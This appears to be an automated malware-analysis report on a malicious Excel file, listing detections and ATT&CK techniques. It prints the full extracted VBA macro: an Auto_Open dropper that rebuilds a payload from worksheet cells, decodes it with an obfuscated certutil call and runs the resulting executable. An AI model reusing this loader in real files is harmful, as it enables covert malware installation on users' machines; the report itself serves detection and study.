Office (OLE) malware analysis — malicious · 5bac7a020f173d6c

MALICIOUS

Office (OLE)

1.11 MB Created: 2016-10-19 22:49:03 Authoring application: Microsoft Excel First seen: 2018-11-05

MD5: 5debb3535cba6615526c64e44d0f5e2b SHA-1: abaa744d9504c7f23a237f8220ac6a441016d518 SHA-256: 5bac7a020f173d6c35f73d76cd3745a36564dbb3dd32f2d5fc5021c353e76a54

570 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an Excel file containing a critical Auto_Open VBA macro that utilizes WScript.Shell and CreateObject to execute obfuscated code. This macro is designed to run automatically when the document is opened, likely to download and execute a second-stage payload. The presence of 'Shell()' calls and the reassembled token 'Scripting.FileSystemObject' strongly indicate malicious intent.

Heuristics 15

ClamAV: Xls.Malware.Valyria-6995973-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Valyria-6995973-0
VBA macros detected medium 7 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

    Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
    Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

Set WshShell = CreateObject("WScript.Shell")
Set WshProcEnv = WshShell.Environment("Process")

Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
Set WshShell = CreateObject("WScript.Shell")
Set WshProcEnv = WshShell.Environment("Process")
```
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Matched line in script
```
Set WshShell = CreateObject("WScript.Shell")
Set WshProcEnv = WshShell.Environment("Process")
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set WshShell = CreateObject("WScript.Shell")
Set WshProcEnv = WshShell.Environment("Process")

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub Auto_Open()
```

Heap-spray pattern detected high SC_HEAP_SPRAY

Repeated 0x41 (A) bytes found

Disassembly

Attempted x86 opcode disassembly

0005BC0E  41                inc ecx
0005BC0F  41                inc ecx
0005BC10  41                inc ecx
0005BC11  41                inc ecx
0005BC12  41                inc ecx
0005BC13  41                inc ecx
0005BC14  41                inc ecx
0005BC15  41                inc ecx
0005BC16  41                inc ecx
0005BC17  41                inc ecx
0005BC18  41                inc ecx
0005BC19  41                inc ecx
0005BC1A  41                inc ecx
0005BC1B  41                inc ecx
0005BC1C  41                inc ecx
0005BC1D  41                inc ecx
0005BC1E  41                inc ecx
0005BC1F  41                inc ecx
0005BC20  41                inc ecx
0005BC21  41                inc ecx
0005BC22  41                inc ecx
0005BC23  41                inc ecx
0005BC24  41                inc ecx
0005BC25  41                inc ecx
0005BC26  41                inc ecx
0005BC27  41                inc ecx
0005BC28  41                inc ecx
0005BC29  41                inc ecx
0005BC2A  41                inc ecx
0005BC2B  41                inc ecx
0005BC2C  41                inc ecx
0005BC2D  41                inc ecx
0005BC2E  41                inc ecx
0005BC2F  41                inc ecx
0005BC30  41                inc ecx
0005BC31  41                inc ecx
0005BC32  41                inc ecx
0005BC33  41                inc ecx
0005BC34  41                inc ecx
0005BC35  41                inc ecx
0005BC36  41                inc ecx
0005BC37  41                inc ecx
0005BC38  41                inc ecx
0005BC39  41                inc ecx
0005BC3A  41                inc ecx
0005BC3B  41                inc ecx
0005BC3C  41                inc ecx
0005BC3D  41                inc ecx
0005BC3E  41                inc ecx
0005BC3F  41                inc ecx
0005BC40  41                inc ecx
0005BC41  41                inc ecx
0005BC42  41                inc ecx
0005BC43  41                inc ecx
0005BC44  41                inc ecx
0005BC45  41                inc ecx
0005BC46  41                inc ecx
0005BC47  41                inc ecx
0005BC48  41                inc ecx
0005BC49  41                inc ecx
0005BC4A  41                inc ecx
0005BC4B  41                inc ecx
0005BC4C  41                inc ecx
0005BC4D  41                inc ecx
0005BC4E  41                inc ecx
0005BC4F  41                inc ecx
0005BC50  41                inc ecx
0005BC51  41                inc ecx
0005BC52  41                inc ecx
0005BC53  41                inc ecx
0005BC54  41                inc ecx
0005BC55  41                inc ecx
0005BC56  41                inc ecx
0005BC57  41                inc ecx
0005BC58  41                inc ecx
0005BC59  41                inc ecx
0005BC5A  41                inc ecx
0005BC5B  41                inc ecx
0005BC5C  41                inc ecx
0005BC5D  41                inc ecx
0005BC5E  41                inc ecx
0005BC5F  41                inc ecx
0005BC60  41                inc ecx
0005BC61  41                inc ecx
0005BC62  41                inc ecx
0005BC63  41                inc ecx
0005BC64  41                inc ecx
0005BC65  41                inc ecx
0005BC66  41                inc ecx
0005BC67  41                inc ecx
0005BC68  41                inc ecx
0005BC69  41                inc ecx
0005BC6A  41                inc ecx
0005BC6B  41                inc ecx
0005BC6C  41                inc ecx
0005BC6D  41                inc ecx

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning

NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED

Long run of 0x41 bytes

Disassembly

Attempted x86 opcode disassembly

0005B8BA  41                inc ecx
0005B8BB  41                inc ecx
0005B8BC  41                inc ecx
0005B8BD  41                inc ecx
0005B8BE  41                inc ecx
0005B8BF  41                inc ecx
0005B8C0  41                inc ecx
0005B8C1  41                inc ecx
0005B8C2  41                inc ecx
0005B8C3  41                inc ecx
0005B8C4  41                inc ecx
0005B8C5  41                inc ecx
0005B8C6  41                inc ecx
0005B8C7  41                inc ecx
0005B8C8  41                inc ecx
0005B8C9  41                inc ecx
0005B8CA  41                inc ecx
0005B8CB  41                inc ecx
0005B8CC  41                inc ecx
0005B8CD  41                inc ecx
0005B8CE  41                inc ecx
0005B8CF  41                inc ecx
0005B8D0  41                inc ecx
0005B8D1  41                inc ecx
0005B8D2  41                inc ecx
0005B8D3  41                inc ecx
0005B8D4  41                inc ecx
0005B8D5  41                inc ecx
0005B8D6  41                inc ecx
0005B8D7  41                inc ecx
0005B8D8  41                inc ecx
0005B8D9  41                inc ecx
0005B8DA  41                inc ecx
0005B8DB  41                inc ecx
0005B8DC  41                inc ecx
0005B8DD  41                inc ecx
0005B8DE  41                inc ecx
0005B8DF  41                inc ecx
0005B8E0  41                inc ecx
0005B8E1  41                inc ecx
0005B8E2  41                inc ecx
0005B8E3  41                inc ecx
0005B8E4  41                inc ecx
0005B8E5  41                inc ecx
0005B8E6  41                inc ecx
0005B8E7  41                inc ecx
0005B8E8  41                inc ecx
0005B8E9  41                inc ecx
0005B8EA  41                inc ecx
0005B8EB  45                inc ebp
0005B8EC  41                inc ecx
0005B8ED  41                inc ecx
0005B8EE  41                inc ecx
0005B8EF  3466              xor al, 0x66
0005B8F1  7567              jne 0x5b95a
0005B8F3  3441              xor al, 0x41
0005B8F5  7441              je 0x5b938
0005B8F7  6e                outsb dx, byte ptr [esi]
0005B8F8  4e                dec esi
0005B8F9  49                dec ecx
0005B8FA  626742            bound esp, qword ptr [edi + 0x42]
0005B8FD  54                push esp
0005B8FE  4d                dec ebp
0005B8FF  306856            xor byte ptr [eax + 0x56], ch
0005B902  47                inc edi
0005B903  6870637942        push 0x42796370
0005B908  7763              ja 0x5b96d
0005B90A  6d                insd dword ptr es:[edi], dx
0005B90B  396e63            cmp dword ptr [esi + 0x63], ebp
0005B90E  6d                insd dword ptr es:[edi], dx
0005B90F  46                inc esi
0005B910  7449              je 0x5b95b
0005B912  47                inc edi
0005B913  4e                dec esi
0005B914  68626d3576        push 0x76356d62
0005B919  64                .byte 0x64

Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2872 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2872 bytes
SHA-256: `55142ee8bd68b0ee109696c52de3bc243b3d976ca1a46c8e846e4e58dc66a206`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Hoja1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "LinesOfBusiness" #If VBA7 Then Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr) #Else Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) #End If Sub Auto_Open() Dim WshShell Dim WshProcEnv Dim isx86 Dim process_architecture Set WshShell = CreateObject("WScript.Shell") Set WshProcEnv = WshShell.Environment("Process") process_architecture = WshProcEnv("PROCESSOR_ARCHITECTURE") If process_architecture = "x86" Then isx86 = WshProcEnv("PROCESSOR_ARCHITEW6432") If isx86 = "" Then isx86 = True Else isx86 = False End If Else isx86 = False End If If (isx86) Then Call LinesOfBusiness.SZ54uAck Else Call LinesOfBusiness.KARlpuHz End If End Sub Function GetVal(sr As Long, er As Long, c As Long) Dim x For i = sr To er x = x + Cells(i, c) Next GetVal = x End Function Function rndname() Dim r As String Dim i As Integer For i = 1 To 8 If i Mod 2 = 0 Then r = Chr(Int((90 - 65 + 1) * Rnd + 65)) & r Else r = Int((9 * Rnd) + 1) & r End If Next i rndname = r End Function Sub cutil(code As String) Dim x As String x = "-----BEG" & "IN CER" & "TIFICATE-----" x = x + vbNewLine x = x + code x = x + vbNewLine x = x + "-----E" & "ND CERTIF" & "ICATE-----" Dim path As String path = Application.UserLibraryPath & rndname & ".txt" expath = Application.UserLibraryPath & rndname & ".exe" Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject") Set file = scr.CreateTextFile(path, True) file.Write x file.Close Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _ Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath) Sleep 2000 Shell (expath) End Sub Sub SZ54uAck() Dim p As String p = GetVal(47104, 47340, 177) cutil (p) End Sub Sub KARlpuHz() Dim p As String p = GetVal(30057, 30293, 199) cutil (p) End Sub

SHA-256: 55142ee8bd68b0ee109696c52de3bc243b3d976ca1a46c8e846e4e58dc66a206

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "LinesOfBusiness"

#If VBA7 Then
    Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
#Else
    Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If

Sub Auto_Open()

Dim WshShell
Dim WshProcEnv
Dim isx86
Dim process_architecture

Set WshShell = CreateObject("WScript.Shell")
Set WshProcEnv = WshShell.Environment("Process")

process_architecture = WshProcEnv("PROCESSOR_ARCHITECTURE")

If process_architecture = "x86" Then
    isx86 = WshProcEnv("PROCESSOR_ARCHITEW6432")
    If isx86 = "" Then
        isx86 = True
    Else
        isx86 = False
    End If
Else
    isx86 = False
End If
If (isx86) Then
    Call LinesOfBusiness.SZ54uAck
Else
    Call LinesOfBusiness.KARlpuHz
End If

End Sub


Function GetVal(sr As Long, er As Long, c As Long)
    Dim x
    For i = sr To er
        x = x + Cells(i, c)
    Next
    GetVal = x
End Function


Function rndname()
    Dim r As String
    Dim i As Integer
     
    For i = 1 To 8
        If i Mod 2 = 0 Then
            r = Chr(Int((90 - 65 + 1) * Rnd + 65)) & r
        Else
            r = Int((9 * Rnd) + 1) & r
        End If
    Next i
    rndname = r
End Function


Sub cutil(code As String)
    Dim x As String
    
    x = "-----BEG" & "IN CER" & "TIFICATE-----"
    x = x + vbNewLine
    x = x + code
    x = x + vbNewLine
    x = x + "-----E" & "ND CERTIF" & "ICATE-----"
    
    Dim path As String
    path = Application.UserLibraryPath & rndname & ".txt"
    expath = Application.UserLibraryPath & rndname & ".exe"
    
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
    Set file = scr.CreateTextFile(path, True)
    file.Write x
    file.Close

    Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
    Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
    Sleep 2000
    Shell (expath)
End Sub


Sub SZ54uAck()
    Dim p As String
    p = GetVal(47104, 47340, 177)
    cutil (p)
End Sub


Sub KARlpuHz()
    Dim p As String
    p = GetVal(30057, 30293, 199)
    cutil (p)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.